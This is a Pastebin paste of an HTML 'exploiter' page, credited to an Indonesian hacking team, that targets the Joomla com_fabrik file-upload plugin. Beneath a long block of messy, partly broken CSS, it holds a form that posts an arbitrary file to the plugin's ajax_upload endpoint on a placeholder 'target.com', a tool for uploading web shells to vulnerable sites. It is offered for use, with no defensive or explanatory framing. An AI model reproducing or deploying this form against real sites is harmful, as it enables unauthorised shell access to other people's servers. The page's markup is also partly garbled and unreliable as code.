Advertisement
Ar4thnr

Joomla CSRF Com_Fabrik File Upload Shell Access Exploiter

Jul 15th, 2019
174
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 4.90 KB | None | 0 0
  1. <!DOCTYPE htmL>
  2. <html lang="en">
  3. <title>Indosec Tools By Mr.Froggy</title>
  4. <head>
  5.      <style type="text/css">
  6.         html,body {
  7.                 background: url(http://cabinet-cton.com//4f4e7f49-145d-484f-add7-2881cc88c8fb.jpg) no-repeat center center fixed;
  8.                 -webkit-background-size: 100% 100%;
  9.                 -moz-background-size: 100% 100%;
  10.                 -o-background-size: 100% 100%;
  11.                 background-size: 100% 100%;
  12.             }
  13.  
  14.  
  15. .wrap{
  16.     background: blue;
  17.     width: 900px;
  18.     margin: 10px auto;
  19. }$breadcrumb-divider: quote(">");
  20.  
  21. /*bagian header*/
  22. .wrap .header{
  23.     background: green;
  24.     /*height: 50px;*/
  25.     padding: 2px 10px;
  26. }
  27.  
  28. /*akhir header*/
  29.  
  30. /*bagian menu*/
  31. .wrap .menu{
  32.     background: red;
  33.    
  34.     }
  35.  
  36. .wrap .menu ul{
  37.     padding: 0;
  38.     margin: 0;
  39.     background: white;
  40.     overflow: hidden;
  41. }
  42.  
  43. .wrap .menu ul li{
  44.     float: left;
  45.     list-style-type: none;
  46.     padding: 10px;
  47. }
  48. /*akhir menu*/
  49.  
  50. .clear{
  51.     clear: both;
  52. }
  53.  
  54. .badan{
  55.     height: 450px;
  56. }
  57. /*bagian sidebar*/
  58. .wrap .badan .sidebar{
  59.     background: black;
  60.     float: left;   
  61.     width: 25%;
  62.     height: 100%;
  63. }
  64.  
  65. /*akhir sidebar*/
  66.  
  67. .wrap .badan .content{
  68.     background: white;
  69.     float: left;
  70.     height: 100%;
  71.     width: 75%;
  72. }
  73.  
  74. .wrap .footer{
  75.     width: 100%;
  76.     padding: 10px;
  77. }
  78. {
  79.  
  80. }
  81. .breadcrumb-divider
  82. breadcrumb-divider: quote;
  83. breadcrumb-divider: none;
  84.  
  85. }
  86. .card-columns {
  87.   @include media-breakpoint-only(lg) {
  88.     column-count: 4;
  89.   }
  90.   @include media-breakpoint-only(xl) {
  91.     column-count: 5;
  92.   }
  93. }
  94. .card {
  95.     position: relative;
  96.     display: -ms-flexbox;
  97.     display: flex;
  98.     -ms-flex-direction: column;
  99.     flex-direction: column;
  100.     min-width: 0;
  101.     word-wrap: break-word;
  102.     background-color: #fff;
  103.     background-clip: border-box;
  104.     border: 1px solid rgba(0,0,0,.125);
  105.     border-radius: .25rem;
  106. }
  107. .card-img-overlay {
  108.     position: absolute;
  109.     top: 0;
  110.     right: 0;
  111.     bottom: 0;
  112.     left: 0;
  113.     padding: 1.25rem;
  114. }
  115. *, ::after, ::before {
  116.     box-sizing: border-box;
  117. }
  118. div {
  119.     display: block;
  120. }
  121. .text-white {
  122.     color: #fff!important;
  123. }
  124. .card {
  125.     position: relative;
  126.     display: -ms-flexbox;
  127.     display: flex;
  128.     -ms-flex-direction: column;
  129.     flex-direction: column;
  130.     min-width: 0;
  131.     word-wrap: break-word;
  132.     background-color: #fff;
  133.     background-clip: border-box;
  134.     border: 1px solid rgba(0,0,0,.125);
  135.     border-radius: .25rem;
  136. }
  137. body {
  138.     margin: 0;
  139.     font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";
  140.     font-size: 1rem;
  141.     font-weight: 400;
  142.     line-height: 1.5;
  143.     color: #212529;
  144.     text-align: left;
  145.     background-color: #fff;
  146. }
  147. :root {
  148.     --blue: #007bff;
  149.     --indigo: #6610f2;
  150.     --purple: #6f42c1;
  151.     --pink: #e83e8c;
  152.     --red: #dc3545;
  153.     --orange: #fd7e14;
  154.     --yellow: #ffc107;
  155.     --green: #28a745;
  156.     --teal: #20c997;
  157.     --cyan: #17a2b8;
  158.     --white: #fff;
  159.     --gray: #6c757d;
  160.     --gray-dark: #343a40;
  161.     --primary: #007bff;
  162.     --secondary: #6c757d;
  163.     --success: #28a745;
  164.     --info: #17a2b8;
  165.     --warning: #ffc107;
  166.     --danger: #dc3545;
  167.     --light: #f8f9fa;
  168.     --dark: #343a40;
  169.     --breakpoint-xs: 0;
  170.     --breakpoint-sm: 576px;
  171.     --breakpoint-md: 768px;
  172.     --breakpoint-lg: 992px;
  173.     --breakpoint-xl: 1200px;
  174.     --font-family-sans-serif: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";
  175.     --font-family-monospace: SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;
  176. }
  177. html {
  178.     font-family: sans-serif;
  179.     line-height: 1.15;
  180.     -webkit-text-size-adjust: 100%;
  181.     -webkit-tap-highlight-color: transparent;
  182. }
  183. user agent stylesheet
  184. html {
  185.     color: -internal-root-color;
  186. }
  187. *, ::after, ::before {
  188.     box-sizing: border-box;
  189. }
  190. *, ::after, ::before {
  191.     box-sizing: border-b
  192.     color: #fff;
  193. }
  194. </style>
  195. <body>
  196.     <div class="container">
  197.         <div class="webkit-text-size-adjust">
  198.         </div>
  199.     </div>
  200. </body>
  201. <br>
  202. <br>
  203. <font size="10"><font color="white">Joomla CSRF Com_Fabrik File Upload Shell Access Exploiter</h1><br><br></font></font>
  204. <h1 size="5"><font color="red">Tools Indosec Coder Team</font></h1>
  205.     <form method="POST" action="http://target.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
  206.     <input type="file" name="file"><button>kirim</button>
  207.     </form>
  208.      <?php } ?>  
  209.     <h2><p><font color="red" size="4pt">Thanks yang telah membantu membuat tools ini :</font><marquee width="70%" style="color:red;"><font size="3pt">Indosec Coder Team | rizsyad dan semua member Indosec Coder Team |Anonymous Cyber Team / By Froggy</font></marquee></p></h2>
  210.   </div>
  211.  
  212. </html>
  213. </center><br></font>
  214. </head>
  215. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement